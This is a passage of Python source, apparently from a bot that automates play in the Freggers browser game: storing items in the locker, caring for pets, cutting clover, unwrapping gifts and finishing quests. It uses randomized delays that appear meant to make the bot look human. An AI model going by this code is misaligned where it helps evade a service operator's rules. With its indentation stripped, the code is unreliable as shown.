self.log('Deleting disposable consumables...')
disposable_item_names = self.disposable_consuamables
deleted_items = 0
for item in list(inv):
if item != None and item['description'] in disposable_item_names:
if self.delete_item(item):
deleted_items += 1
remaining_slots -= 1
inv.remove(item)
if remaining_slots == 0:
break
if deleted_items > 0:
self.log('Deleted {} items.'.format(deleted_items))
if remaining_slots > 0:
self.log('Trying to store {} more items in the locker...'.format(remaining_slots))
locker_inv = self.ajax_request_locker()
empty_locker_slots = FreggersBot.count_empty_slots(locker_inv)
if remaining_slots <= empty_locker_slots:
self.log('Going to store {} items in the locker...'.format(remaining_slots))
self.go_to_room('wutzlhofen.kroetenbank', False)
self.__e_room_loaded.wait()
self.log('Waiting for locker to be opened.')
locker = self.find_item_by_gui('wutzlhofen.kroetenbank_schliessfaecher')
event_wait = self.get_wait_for_event(Event.ACTION_OPEN_LOCKER)
self.send_item_interaction(locker.wob_id, 'USE')
inv_prefered = list(filter(lambda item: item != None and item['description'] in self.prefered_store_items, inv))
inv_non_consumables = list(filter(lambda item: item != None and item['description'] not in self.consumable_items, inv))
event_wait.wait_once()
self.log('Locker was opened.')
deposited_items = 0
while remaining_slots > 0 and len(inv) > 0:
item = None
if len(inv_prefered) > 0:
item = inv_prefered.pop()
print(item, inv)
inv.remove(item)
elif len(inv_non_consumables) > 0:
item = inv_non_consumables.pop()
print(item, inv)
inv.remove(item)
else:
item = inv.pop()
if item != None:
if self.ajax_deposit_item(item['id']):
remaining_slots -= 1
deposited_items += 1
self.log('Deposited {} items in locker.'.format(deposited_items))
return remaining_slots == 0
else:
self.log('Not enough slots available in locker. There are only {} empty slots to store {} items.'.format(empty_locker_slots, remaining_slots))
return False
return True
def closest_room_item(self, item_gui):
self.__e_room_loaded.wait()
return self.closest_iso_item(self.find_items_by_gui(item_gui))
def closest_iso_item(self, iso_items):
if len(iso_items) > 1:
if self.player != None:
player_pos = self.player.iso_obj.get_uvz()
closest_distance = -1
closest_item = None
for iso_item in iso_items:
distance = iso_item.iso_obj.get_uvz().distance(player_pos)
if distance < closest_distance or closest_distance == -1:
closest_item = iso_item
closest_distance = distance
return closest_item
else:
return None
return None if len(iso_items) == 0 else iso_items[0]
def get_room_items_by_distance(self):
return self.sort_iso_items_by_distance(self.wob_registry.iso_items)
def sort_iso_items_by_distance(self, iso_items, player = None):
if player == None:
player = self.player
if len(iso_items) > 1:
if player != None:
player_pos = player.iso_obj.get_uvz()
return sorted(list(iso_items), key = lambda x: x.iso_obj.get_uvz().distance(player_pos))
else:
return None
return iso_items
def pickup_room_item(self, wob_id):
return ItemPickup(self, wob_id).pickup_once()
def search_room_item(self, wob_id):
return ItemSearch(self, wob_id).search_once()
def pickup_closest_room_item(self, item_gui):
item = self.closest_room_item(item_gui)
if item != None:
return self.pickup_room_item(item.wob_id)
return False
def search_closest_room_item(self, item_gui):
item = self.closest_room_item(item_gui)
if item != None:
return self.search_room_item(item.wob_id)
return False
def pickup_any(self, item_gui):
pickup = ItemPickup(self, 0)
for iso_item in self.get_room_items_by_distance():
if iso_item.gui == item_gui:
pickup.wob_id = iso_item.wob_id
if pickup.pickup():
pickup.cleanup()
return iso_item
pickup.cleanup()
return None
def ensure_item_in_inv(self, item_name, relation_id = 0, price = 0):
for inv_item in self.ajax_request_inventory():
if inv_item != None and inv_item['description'] == item_name:
return inv_item
if self.ensure_empty_slots(1):
for queue_item in self.ajax_request_item_queue():
if queue_item['description'] == item_name:
self.ajax_inbox_action(queue_item['id'], Freggers.INBOX_ACTION_ACCEPT)
return queue_item
if relation_id != 0 and price != 0:
if self.ajax_buy_item(relation_id, price):
for inv_item in self.ajax_request_inventory():
if inv_item != None and inv_item['description'] == item_name:
return inv_item
else:
return -1
return 0
def care_pompom(self, room, exact):
room += '#@#' + str(self.user_id)
self.go_to_room(room, exact)
self.__e_room_loaded.wait()
self.log('[Pompom] Looking for Pompom to cuddle.')
for item in self.wob_registry.iso_items:
for interaction in item.interactions:
if interaction.label == 'CUDDLE_POMPOM':
pompom_wob_id = item.wob_id
event = threading.Event()
def cb(data):
event.set()
self.register_callback(Event.SHOW_TIMER_BAR, cb)
cuddle_count = 0
self.log('[Pompom] Found Pompom.')
failure_count = 0
while True:
for property in item.get_properties():
if property.key == 'hintbubble' and property.value == 'cuddle_me':
event.clear()
self.log('[Pompom] Cuddling...')
self.send_item_interaction(pompom_wob_id, 'CUDDLE_POMPOM')
if event.wait(5):
time.sleep(1)
failure_count = 0
cuddle_count += 1
self.log('[Pompom] Cuddled {} times.'.format(cuddle_count))
self.wait_random_delay(20, 23)
else:
failure_count += 1
if failure_count >= 5:
self.log('[Pompom] Cannot cuddle - aborting.')
return False
elif property.key == 'item_description' and len([int(s) for s in property.value.split() if s.isdigit()]) == 0:
self.log('[Pompom] Pompom is happy for now.')
self.unregister_callback(Event.SHOW_TIMER_BAR, cb)
return True
time.sleep(0.3)
self.log('[Pompom] Could not find Pompom in room.')
return False
def __care_pet_give_effect(self, wob_id, effect_name, relation_id, price):
self.log('[PetCare] Ensuring effect \'{}\' is in inventory...'.format(effect_name))
item = self.ensure_item_in_inv(effect_name, relation_id, price)
if item:
self.log('[PetCare] Throwing effect \'{}\' at {}...'.format(effect_name, wob_id))
self.ajax_item_usewith(item['id'], wob_id)
return True
else:
self.log('[PetCare] Could not make sure effect \'{}\' is in inventory.'.format(effect_name))
return False
def __care_pet(self, wob_id, room, exact):
#Drachen-Ei TRANSFORM
while True:
wob = self.wob_registry.get_object_by_wobid(wob_id)
if wob == None:
self.log('[PetCare] Pet was not found!')
break
primary_interaction = wob.get_primary_interaction()
if primary_interaction != None and primary_interaction.label == 'PONY_HELP' and len(wob.interactions) == 6:
self.log('[PetCare] Pet \'{}\' - {} is happy for now.'.format(wob.name, wob.gui))
break
for property in wob.get_properties():
if property.key == 'hintbubble':
hint = property.value
if hint == 'drink_dragon' or hint == 'drink_pony':
pony_drink = hint == 'drink_pony'
drink_name = self.localeItems.HORSE_MILK if pony_drink else self.localeItems.DRAGON_MILK
drink_source_gui = 'tp_botanik.milchwagen_horse' if pony_drink else 'tp_botanik.fueldispenser_dragon'
self.log('[PetCare] Pet wants to drink \'{}\'.'.format(drink_name))
inv = self.ajax_request_inventory()
drinks = FreggersBot.filter_item(inv, drink_name)
if len(drinks) == 0:
self.log('[PetCare] No \'{}\' in inventory.'.format(drink_name))
if not self.ensure_empty_slots(1):
self.log('[PetCare] No inventory space available.')
return False
drinks_in_queue = FreggersBot.filter_item(self.ajax_request_item_queue(), drink_name)
if len(drinks_in_queue) == 0:
self.log('[PetCare] No \'{}\' in item queue either. Collecting new...'.format(drink_name))
self.go_to_room('tp_botanik.fairy', False)
self.__e_room_loaded.wait()
drink_source = self.find_item_by_gui(drink_source_gui)
if drink_source != None:
self.log('[PetCare] Drink source found.')
self.__e_success_cb.clear()
self.register_callback(Event.NOTIFY_CREATE_ITEM, self.__cb_success)
self.register_callback(Event.SHOW_ACTION_FEEDBACK, self.__cb_failure)
count = 0
for _ in range(3):
self.__e_success_cb.clear()
self.send_item_interaction(drink_source.wob_id, 'SEARCH')
self.__e_success_cb.wait()
if not self.__success:
break
count += 1
self.log('[PetCare] Collected drink \'{}\' {} times.'.format(drink_name, count))
self.unregister_callback(Event.NOTIFY_CREATE_ITEM, self.__cb_success)
self.unregister_callback(Event.SHOW_ACTION_FEEDBACK, self.__cb_failure)
else:
self.log('[PetCare] Could not find drink source for \'{}\'.'.format(drink_name))
return False
self.log('[PetCare] Going back to room {}.'.format(room))
self.go_to_room(room, exact)
self.__e_room_loaded.wait()
else:
self.log('[PetCare] Requesting \'{}\' from item queue...'.format(drink_name))
dragon_drink = drinks_in_queue.pop(0)
self.ajax_inbox_action(dragon_drink['id'], Freggers.INBOX_ACTION_ACCEPT)
self.log('[PetCare] Successfully accepted \'{}\' from item queue.'.format(drink_name))
self.log('[PetCare] Giving \'{}\' to \'{}\' - {}...'.format(drink_name, wob.name, wob.gui))
self.send_item_interaction(wob_id, 'PONY_MILK' if pony_drink else 'DRAGON_FUEL')
time.sleep(2.5)
self.log('[PetCare] Gave \'{}\' - {} its drink.'.format(wob.name, wob.gui))
elif hint == 'cuddle_me':
self.log('[PetCare] Pet needs to be cuddled.')
self.__e_timer_bar.clear()
self.send_item_interaction(wob_id, 'PET')
self.__e_timer_bar.wait()
time.sleep(self.timer_bar)
elif hint == 'blanket_purple' or hint == 'blanket_green':
self.log('[PetCare] Pet needs blanket.')
green_blanket = hint == 'blanket_green'
inv = self.ajax_request_inventory()
imgurl = 'tp_botanik/kuscheldeckegruen_horse' if green_blanket else 'tp_botanik/kuscheldecke_horse'
blankets = list(filter(lambda item: item != None and imgurl in item['imgurl'], inv))
if len(blankets) == 0:
self.log('[PetCare] No blanket in inventory.')
if not self.ensure_empty_slots(1):
self.log('[PetCare] No inventory space available.')
return False
blankets_in_queue = list(filter(lambda item: item != None and imgurl in item['imgurl'], self.ajax_request_item_queue()))
if len(blankets_in_queue) == 0:
self.log('[PetCare] No blanket in item queue. Trying to pickup from room...')
blanket_gui = 'tp_botanik.kuscheldeckegruen_horse' if green_blanket else 'tp_botanik.kuscheldecke_horse'
if self.pickup_closest_room_item(blanket_gui):
self.log('[PetCare] Blanket picked up.')
else:
self.log('[PetCare] Buying new blanket...')
self.ajax_buy_item(2401 if green_blanket else 2400, 20)
self.log('[PetCare] Bought new blanket.')
else:
blanket = blankets_in_queue.pop(0)
self.ajax_inbox_action(blanket['id'], Freggers.INBOX_ACTION_ACCEPT)
self.log('[PetCare] Giving blanket to pet...')
self.send_item_interaction(wob_id, primary_interaction.label)
time.sleep(2.5)
elif hint == 'no_blanket_purple' or hint == 'no_blanket_green':
self.log('[PetCare] Pet wants removal of blanket.')
self.send_item_interaction(wob_id, 'PONY_NO_BLANKET_PURPLE' if hint == 'no_blanket_purple' else 'PONY_NO_BLANKET_GREEN')
time.sleep(2.5)
elif hint == 'no_diaper':
self.log('[PetCare] Pet wants removal of diaper.')
for item in self.wob_registry.iso_items.copy():
if item.gui == 'tp_botanik.windel_horse':
self.send_item_interaction(item.wob_id, 'USE')
time.sleep(0.9 + 2)
elif hint == 'no_dung':
self.log('[PetCare] Pet wants removal of dung.')
for item in self.wob_registry.iso_items.copy():
if item.gui == 'tp_botanik.pferdeapfel2_horse':
self.send_item_interaction(item.wob_id, 'USE')
time.sleep(0.9 + 2)
elif hint == 'musical_box':
self.log('[PetCare] Pet wants music to be played.')
for item in self.wob_registry.iso_items:
if item.gui == 'tp_botanik.spieluhr_horse':
self.send_item_interaction(item.wob_id, 'USE')
time.sleep(5)
break
elif hint == 'mixed_drink_dragon' or hint == 'mixed_drink_pony':
pony_drink = hint == 'mixed_drink_pony'
drink_name = self.localeItems.HORSE_MIXED_MILK if pony_drink else self.localeItems.DRAGON_MIXED_MILK
self.log('[PetCare] Pet needs mixed drink \'{}\'.'.format(drink_name))
inv = self.ajax_request_inventory()
mixed_drinks = FreggersBot.filter_item(inv, drink_name)
if len(mixed_drinks) == 0:
self.log('[PetCare] There are no \'{}\' in inventory.'.format(drink_name))
ingredient_name = self.localeItems.STRAWBERRY if pony_drink else self.localeItems.CHILI
ingredient_source_gui = 'tp_botanik.erdbeerstaude_horse' if pony_drink else 'tp_botanik.chilistaude_dragon'
ingredients = FreggersBot.filter_item(inv, ingredient_name)
ingredient_present = len(ingredients) > 0
milk_name = self.localeItems.HORSE_MILK if pony_drink else self.localeItems.DRAGON_MILK
milk_source_gui = 'tp_botanik.milchwagen_horse' if pony_drink else 'tp_botanik.fueldispenser_dragon'
milks = FreggersBot.filter_item(inv, milk_name)
milk_present = len(milks) > 0
empty_slots_needed = (0 if ingredient_present else 1) + (0 if milk_present else 1)
if empty_slots_needed > 0:
if not self.ensure_empty_slots(empty_slots_needed):
self.log('[PetCare] No inventory space available.')
return False
inv_queue = self.ajax_request_item_queue()
ingredients_in_queue = FreggersBot.filter_item(inv_queue, ingredient_name)
milks_in_queue = FreggersBot.filter_item(inv_queue, milk_name)
if len(ingredients_in_queue) > 0:
ingredient = ingredients_in_queue.pop()
self.ajax_inbox_action(ingredient['id'], Freggers.INBOX_ACTION_ACCEPT)
ingredients.append(ingredient)
inv.append(ingredient)
ingredient_present = True
if len(milks_in_queue) > 0:
milk = milks_in_queue.pop()
self.ajax_inbox_action(milk['id'], Freggers.INBOX_ACTION_ACCEPT)
milks.append(milk)
inv.append(milk)
milk_present = True
if not milk_present or not ingredient_present:
self.go_to_room('tp_botanik.fairy', False)
self.__e_room_loaded.wait()
ingredient_source = self.find_item_by_gui(ingredient_source_gui)
milk_source = self.find_item_by_gui(milk_source_gui)
search = ItemSearch(self, 0)
milk_collected = 0
ingredient_collected = 0
if not milk_present and not ingredient_present:
search.wob_id = ingredient_source.wob_id
if not search.search():
self.log('[PetCare] Could not collect ingredient \'{}\'.'.format(ingredient_name))
return False
search.wob_id = milk_source.wob_id
if not search.search():
self.log('[PetCare] Could not collect milk \'{}\'.'.format(milk_name))
return False
milk_collected += 1
ingredient_collected += 1
self.log('[PetCare] Collected both ingredients \'{}\' and \'{}\' to mix \'{}\'.'.format(milk_name, ingredient_name, drink_name))
search.wob_id = milk_source.wob_id
for _ in range(max(0, 3 - len(milks) - len(milks_in_queue) - milk_collected)):
if not search.search():
self.log('[PetCare] Could not collect milk \'{}\'.'.format(milk_name))
return False
search.wob_id = ingredient_source.wob_id
for _ in range(max(0, 3 - len(ingredients) - len(ingredients_in_queue) - ingredient_collected)):
if not search.search():
self.log('[PetCare] Could not collect ingredient \'{}\'.'.format(ingredient_name))
return False
search.cleanup()
self.log('[PetCare] Going back to room {}.'.format(room))
self.go_to_room(room, exact)
self.__e_room_loaded.wait()
if self.ajax_item_interact(FreggersBot.filter_item(self.ajax_request_inventory(), milk_name)[0]['id'], 'MIX'):
self.log('[PetCare] Mixed \'{}\' and \'{}\' to \'{}\'.'.format(milk_name, ingredient_name, drink_name))
else:
self.log('[PetCare] Error mixing \'{}\' and \'{}\' to \'{}\'.'.format(milk_name, ingredient_name, drink_name))
return False
self.send_item_interaction(wob_id, 'PONY_STRAWBERRY_MILK' if pony_drink else 'DRAGON_CHILI_FUEL')
elif hint == 'food_pony' or hint == 'food_dragon':
self.log('[PetCare] Pet needs food.')
pony_food = hint == 'food_pony'
food_name = self.localeItems.STRAWBERRY if pony_food else self.localeItems.CHILI
food_item = self.ensure_item_in_inv(food_name)
if not food_item:
if food_item == 0:
self.log('[PetCare] Collecting food \'{}\' 3 times...'.format(food_name))
food_source_name = 'tp_botanik.erdbeerstaude_horse' if pony_food else 'tp_botanik.chilistaude_dragon'
self.go_to_room('tp_botanik.fairy', False)
self.__e_room_loaded.wait()
food_source = self.find_item_by_gui(food_source_name)
search = ItemSearch(self, food_source.wob_id)
for _ in range(3):
search.search()
search.cleanup()
self.log('[PetCare] Collected food \'{}\' 3 times.'.format(food_name))
self.log('[PetCare] Going back to room {}.'.format(room))
self.go_to_room(room, exact)
self.__e_room_loaded.wait()
else:
self.log('[PetCare] Could not get food \'{}\' into inventory.'.format(food_name))
return False
self.send_item_interaction(wob_id, 'PONY_STRAWBERRY' if pony_food else 'DRAGON_CHILI')
self.log('[PetCare] Gave pet its food \'{}\'.'.format(food_name))
elif hint == 'flowers_dragon' or hint == 'flowers_pony':
pony_flowers = hint == 'flowers_pony'
flowers_name = self.localeItems.HORSE_FLOWER if pony_flowers else self.localeItems.DRAGON_FLOWER
flower = self.ensure_item_in_inv(flowers_name, 1976 if pony_flowers else 2399, 20)
if flower != None:
self.log('[PetCare] Giving flowers \'{}\' to pet.'.format(flowers_name))
self.send_item_interaction(wob_id, 'PONY_FLOWERS' if pony_flowers else 'DRAGON_FLOWERS')
time.sleep(2.5)
else:
self.log('[PetCare] Could not get flower \'{}\'.')
return False
elif hint == 'activator_dragon' or hint == 'activator_pony':
pony_activator = hint == 'activator_pony'
activator_name = self.localeItems.HORSESHOE if pony_activator else self.localeItems.DRAGON_TORCH
activator_gui = 'tp_botanik.hufeisen_horse' if pony_activator else 'tp_botanik.torch_dragon'
self.log('[PetCare] Pet needs activator \'{}\'.'.format(activator_name))
if not FreggersBot.contains(self.ajax_request_inventory(), lambda item: item != None and item['description'] == activator_name):
self.log('[PetCare] There is no \'{}\' in the inventory.'.format(activator_name))
if not self.ensure_empty_slots(1):
self.log('[PetCare] No inventory space available.')
return False
if self.pickup_any(activator_gui) == None:
self.log('[PetCare] Could not pickup a \'{}\' - buying a new one.'.format(activator_name))
self.ajax_buy_item(1978 if pony_activator else 2403, 20)
else:
self.log('[PetCare] Picked up a \'{}\'.'.format(activator_name))
self.log('[PetCare] Giving dragon torch to pet...')
self.send_item_interaction(wob_id, 'PONY_HORSE_SHOE' if pony_activator else 'DRAGON_TORCH')
time.sleep(2.5)
elif hint == 'magic_clover':
self.log('[PetCare] Pet needs clover effect.')
if not self.__care_pet_give_effect(wob_id, self.localeItems.EFFECT_CLOVER, 2164, 3):
return False
time.sleep(2.5)
elif hint == 'magic_DragonSymbols':
self.log('[PetCare] Pet needs dragon symbols effect.')
if not self.__care_pet_give_effect(wob_id, self.localeItems.EFFECT_SYMBOLS, 2774, 3):
return False
time.sleep(2.5)
elif hint == 'magic_glitter':
self.log('[PetCare] Pet needs glitter effect.')
if not self.__care_pet_give_effect(wob_id, self.localeItems.EFFECT_GLITTER, 2138, 1):
return False
time.sleep(2.5)
elif hint == 'magic_hearts':
self.log('[PetCare] Pet needs hearts effect.')
if not self.__care_pet_give_effect(wob_id, self.localeItems.EFFECT_HEARTS, 1977, 5):
return False
time.sleep(2.5)
elif hint == 'magic_stars':
self.log('[PetCare] Pet needs stars effect.')
if not self.__care_pet_give_effect(wob_id, self.localeItems.EFFECT_STARS, 2116, 3):
return False
time.sleep(2.5)
elif hint == 'magic_butterflies':
self.log('[PetCare] Pet needs butterflies effect.')
if not self.__care_pet_give_effect(wob_id, self.localeItems.EFFECT_BUTTERFLIES, 2242, 3):
return False
time.sleep(2.5)
elif hint == 'magic_snow':
self.log('[PetCare] Pet needs snowflakes effect.')
if not self.__care_pet_give_effect(wob_id, self.localeItems.EFFECT_SNOWFLAKES, 2198, 3):
return False
time.sleep(2.5)
elif hint == 'magic_Fire':
self.log('[PetCare] Pet needs fireball effect.')
if not self.__care_pet_give_effect(wob_id, self.localeItems.EFFECT_FIREBALL, 2632, 3):
return False
time.sleep(2.5)
else:
self.log('[PetCare] Unhandled hint:', hint)
self.log('Pet:', wob.gui, wob.name)
self.log('Pet interaction:', primary_interaction, wob.interactions)
self.log('Pet properties:', wob.get_properties())
time.sleep(2.5)
def go_to_home(self, room, exact):
self.go_to_room(room + '#@#' + str(self.user_id), exact)
def care_pets(self, room, exact):
room += '#@#' + str(self.user_id)
self.go_to_room(room, exact)
self.__e_room_loaded.wait()
pets = []
for item in self.wob_registry.iso_items:
if item.gui.startswith('tp_botanik.'):
for pet_gui_prefix in FreggersBot.PET_GUI_PREFIXES:
if item.gui.startswith(pet_gui_prefix):
pets.append(item.wob_id)
break
self.log('[PetCare] Found {} pets.'.format(len(pets)))
for pet_wob_id in pets:
self.__care_pet(pet_wob_id, room, exact)
self.log('[PetCare] Took care of all pets in room {}.'.format(room))
def find_item_by_gui(self, gui):
for item in self.wob_registry.iso_items:
if item.gui == gui:
return item
return None
def find_items_by_gui(self, gui):
list = []
for item in self.wob_registry.iso_items:
if item.gui == gui:
list.append(item)
return list
def find_item_by_name(self, name):
for item in self.wob_registry.iso_items:
if item.name == name:
return item
return None
def find_items_by_name(self, name):
list = []
for item in self.wob_registry.iso_items:
if item.name == name:
list.append(item)
return list
def find_player_room(self, name):
if self.wob_registry.get_player_by_name(name) != None:
return ''
else:
req_profile = self._session.get(self.localeItems.URL + '/sidebar/profile/user/' + name)
if req_profile.status_code == 200:
text_profile = req_profile.text
loc_start = text_profile.find('gotoSpecifiedRoom(\'', text_profile.find('user-go-button'))
if loc_start != -1:
loc_start += 19
loc_end = text_profile.find('\'', loc_start)
loc = text_profile[loc_start:loc_end]
return loc
return None
def get_is_badge_completed(self, badge_id, badge_page = None):
if badge_page == None:
badge_page = self.get_badge_page()
if badge_page != None:
badge_start = badge_page.find('badge_id_' + str(badge_id) + '"')
if badge_start != -1:
i = badge_page.find('ba-requirement', badge_start)
return (badge_page.find('ba-progress-container', badge_start, badge_page.find('ba-badge-desc', badge_start)) == -1 and
badge_page.find('ba-requirement-achieved', i, badge_page.find('"', i)) != -1)
return None
def get_badge_page(self, user_id = None):
if user_id == None:
user_id = self.user_id
req_badges = self._session.get(self.localeItems.URL + '/sidebar/badge/user_badges?user_id=' + user_id)
if req_badges.status_code == 200:
return req_badges.text
return None
def get_badge_tasks(self, badge_id, user_id = None):
if user_id == None:
user_id = self.user_id
req_badge = self._session.get(self.localeItems.URL + '/sidebar/badge/user_badge_detail?badge_id={};user_id={}'.format(badge_id, user_id))
if req_badge.status_code == 200:
badge_info = req_badge.text
tasks = []
start = badge_info.find('ba-description')
i = badge_info.find('ba-requirement-todo', start)
while i != -1:
tasks.append((i, False))
i = badge_info.find('ba-requirement-todo', i + 19)
i = badge_info.find('ba-requirement-done', start)
while i != -1:
tasks.append((i, True))
i = badge_info.find('ba-requirement-done', i + 19)
result = []
for x in sorted(tasks, key = lambda x: x[0]):
result.append(x[1])
return result
return None
def get_has_fregger_check(self):
if self.__fregger_check != None:
return self.__fregger_check
else:
val = self.get_is_badge_completed(19)
self.__fregger_check = val
return val
def get_has_30_visitors_badge(self):
return self.get_is_badge_completed(13)
def cut_clover(self, amount):
self.log('[Cut Clover] Cutting {} clover...'.format(amount))
self.go_to_room('tp_botanik.azubi', False)
self.__e_room_loaded.wait()
self.__clover_count = 0
self.__clover_expect_event = 0
clover_cut_event = threading.Event()
def clover_cb_set_hand_held(data):
if self.__clover_expect_event == 1 and data['gui'] == 'tp_botanik.tp_botanik_klee':
self.__clover_expect_event = 0
self.__clover_count = data['count']
self.__clover_consumer_wob_id = data['consumer_wobids'][0]
self.log('[Cut Clover] {}/8'.format(self.__clover_count))
clover_cut_event.set()
def clover_cb_clear_hand_held():
if self.__clover_expect_event == 2:
self.__clover_expect_event = 0
self.__clover_count = 0
self.log('[Cut Clover] Put in press.')
clover_cut_event.set()
def clover_cb_show_action(data):
if self.__clover_expect_event == 1:
self.__clover_expect_event = 0
self.log('[Cut Clover] Clover not ready yet. Moving on...')
clover_cut_event.set()
self.register_callback(Event.SHOW_ACTION_FEEDBACK, clover_cb_show_action)
self.register_callback(Event.SET_HAND_HELD, clover_cb_set_hand_held)
self.register_callback(Event.CLEAR_HAND_HELD, clover_cb_clear_hand_held)
clovers = self.find_items_by_gui('tp_botanik.tp_botanik_klee')
for _ in range(math.ceil(amount / 8)):
remaining = min(8, amount)
while self.__clover_count < remaining:
clovers_copy = list(clovers)
for _ in range(len(clovers)):
clover = self.closest_iso_item(clovers_copy)
clovers_copy.remove(clover)
clover_cut_event.clear()
self.__clover_expect_event = 1
self.send_item_interaction(clover.wob_id, 'CUT')
clover_cut_event.wait()
self.wait_random_delay(0.3, 1.5)
if self.__clover_count >= remaining:
break
clover_cut_event.clear()
self.__clover_expect_event = 2
self.send_use_handheld_with(self.__clover_consumer_wob_id)
clover_cut_event.wait()
self.wait_random_delay(0.3, 2.5)
self.unregister_callback(Event.SHOW_ACTION_FEEDBACK, clover_cb_show_action)
self.unregister_callback(Event.SET_HAND_HELD, clover_cb_set_hand_held)
self.unregister_callback(Event.CLEAR_HAND_HELD, clover_cb_clear_hand_held)
del self.__clover_consumer_wob_id
del self.__clover_count
del self.__clover_expect_event
self.log('[Cut Clover] Done.')
def unwrap_gifts(self, max_amount = 7):
guis = ['wutzlhofen.kiste_a_tutorial', 'wutzlhofen.kiste_b_tutorial', 'wutzlhofen.kiste_c_tutorial', 'wutzlhofen.kiste_d_tutorial', 'wutzlhofen.kiste_f_tutorial', 'wutzlhofen.kiste_h_tutorial']
unwrap_target_map = {
self.localeItems.GIFT_0: (49, 182, 47, 0),
self.localeItems.GIFT_1: (157, 208, 47, 6),
self.localeItems.GIFT_2: (21, 176, 47, 0),
self.localeItems.GIFT_3: (68, 149, 47, 6),
self.localeItems.GIFT_4: (152, 150, 47, 0),
self.localeItems.GIFT_5: (156, 228, 47, 0),
self.localeItems.GIFT_6: (28, 266, 47, 0),
self.localeItems.GIFT_7: (156, 228, 47, 0),
self.localeItems.GIFT_8: (68, 149, 47, 6),
self.localeItems.GIFT_9: (21, 278, 47, 0),
self.localeItems.GIFT_10: (157, 155, 47, 0)
}
self.log('[Unwrap Gifts] Unwrapping up to {} gift(s)...'.format(max_amount))
if not self.ensure_empty_slots(1):
self.log('[Unwrap Gifts] No inventory space available.')
return False
self.go_to_home(FreggersBot.AP_APARTMENT, False)
self.__e_room_loaded.wait()
unwrap_event = threading.Event()
place_event = threading.Event()
def unwrap_cb_notify_inv(data):
unwrap_event.set()
def unwrap_cb_env_stat(data):
if data['wobid'] == self.player.wob_id and data['status'] == Status.CARRYING and data['value'] == None:
place_event.set()
self.register_callback(Event.NOTIFY_INVENTORY, unwrap_cb_notify_inv)
self.register_callback(Event.ENV_STAT, unwrap_cb_env_stat)
count = 0
def place_objects():
for item in self.ajax_request_inventory():
if item != None and item['description'] in unwrap_target_map:
self.ajax_item_interact(item['id'], 'PLACE')
place_event.clear()
self.send_place_object(*unwrap_target_map[item['description']])
place_event.wait()
self.log('[Unwrap Gifts] Placed \'{}\'.'.format(item['description']))
for iso_item in list(self.wob_registry.iso_items):
if iso_item.gui in guis:
if count >= max_amount:
break
self.log('[Unwrap Gifts] Found gift {} - unwrapping...'.format(iso_item.gui))
unwrap_event.clear()
self.send_item_interaction(iso_item.wob_id, 'UNWRAP')
unwrap_event.wait()
place_objects()
count += 1
self.log('[Unwrap Gifts] {}/{}'.format(count, max_amount))
place_objects()
self.unregister_callback(Event.NOTIFY_INVENTORY, unwrap_cb_notify_inv)
self.unregister_callback(Event.ENV_STAT, unwrap_cb_env_stat)
self.log('[Unwrap Gifts] Unwrapped {}/{} gift(s).'.format(count, max_amount))
return count
def feed_sheeps(self):
self.log('[Feed Sheeps] Giving clover to sheeps...')
self.go_to_room('tp_botanik.azubi', False)
self.__e_room_loaded.wait()
self.__feedsheeps_expect_event = 0
feed_event = threading.Event()
weed_source = self.find_item_by_gui('tp_botanik.grashaufen')
sheeps = self.find_items_by_gui('tp_botanik.schaf')
def feed_sheeps_cb_set_hand_held(data):
if self.__feedsheeps_expect_event == 1 and data['gui'] == 'tp_botanik.powerriegel':
self.__feedsheeps_expect_event = 0
feed_event.set()
self.log('[Feed Sheeps] Collected {}x clover.'.format(data['count']))
def feed_sheeps_cb_update_wob(data):
if self.__feedsheeps_expect_event == 2 and data.effect != None and data.effect.gui == 'dotsflowup':
self.__feedsheeps_expect_event = 0
feed_event.set()
self.log('[Feed Sheeps] Fed sheep.')
self.register_callback(Event.SET_HAND_HELD, feed_sheeps_cb_set_hand_held)
self.register_callback(Event.ACTION_UPDATE_WOB, feed_sheeps_cb_update_wob)
self.__feedsheeps_expect_event = 1
self.send_item_interaction(weed_source.wob_id, 'TAKE_POWERRIEGEL')
feed_event.wait()
sheeps = self.sort_iso_items_by_distance(sheeps)
self.wait_random_delay(0.5, 2.5)
for x in range(2):
for sheep in sheeps:
feed_event.clear()
self.__feedsheeps_expect_event = 2
self.send_use_handheld_with(sheep.wob_id)
feed_event.wait()
self.wait_random_delay(0.5, 2)
if x == 0:
self.wait_random_delay(3.7, 4)
self.wait_random_delay(0.5, 3)
self.unregister_callback(Event.SET_HAND_HELD, feed_sheeps_cb_set_hand_held)
self.unregister_callback(Event.ACTION_UPDATE_WOB, feed_sheeps_cb_update_wob)
del self.__feedsheeps_expect_event
self.log('[Feed Sheeps] Done.')
def complete_quest(self):
quest = self.quest
if quest != None:
self.__e_quest_done.clear()
self.log('[Quest] Completing quest \'{}\'...'.format(quest))
if quest == 'DAILY_SEASON_EASTER_DELIVER_EGGS':
eggs_in_inv = self.filter_items(self.ajax_request_inventory(), self.localeItems.EASTER_EGGS)
if len(eggs_in_inv) == 0 and not self.ensure_empty_slots(1):
self.log('[Quest] No inventory space available.')
return False
eggs_in_queue = None
eggs_count = 0
for egg_slot in eggs_in_inv:
eggs_count += egg_slot['count']
if eggs_count < 10:
eggs_in_queue = self.filter_items(self.ajax_request_item_queue(), self.localeItems.EASTER_EGGS)
missing_eggs = 10 - eggs_count - len(eggs_in_queue)
if missing_eggs > 0:
self.log('[Quest] Collecting {} easter eggs.'.format(missing_eggs))
self.collect_eggs(max_amount = missing_eggs)
eggs_in_queue = self.filter_items(self.ajax_request_item_queue(), self.localeItems.EASTER_EGGS)
eggs_in_inv = self.filter_items(self.ajax_request_inventory(), self.localeItems.EASTER_EGGS)
self.go_to_room('wutzlhofen.park', False)
self.__e_room_loaded.wait()
target = self.find_item_by_gui('tp_botanik.monstereasterbasket')
if target == None:
self.log('[Quest] Could not find monster easter egg.')
return False
for _ in range(10):
egg = None
if len(eggs_in_inv) == 0:
egg = eggs_in_queue.pop(0)
self.ajax_inbox_action(egg['id'], Freggers.INBOX_ACTION_ACCEPT)
self.log('[Quest] Accepted egg from queue.')
else:
egg = eggs_in_inv[0]
if egg['count'] == 1:
del eggs_in_inv[0]
else:
egg['count'] -= 1
self.ajax_item_usewith(egg['id'], target.wob_id)
self.log('[Quest] Threw egg at the monster easter egg.')
self.wait_random_delay(0.5, 2.5)
self.__e_quest_done.wait()
self.log('[Quest] Completed.')
return True
elif quest == 'TUTORIAL_UNWRAP_ALL_BOXES': #2
self.log('[Quest] Unwrapping a gift in the apartment...')
if self.unwrap_gifts(max_amount = 1) == 0:
self.log('[Quest] Could not unwrap a gift.')
return False
self.__e_quest_done.wait()
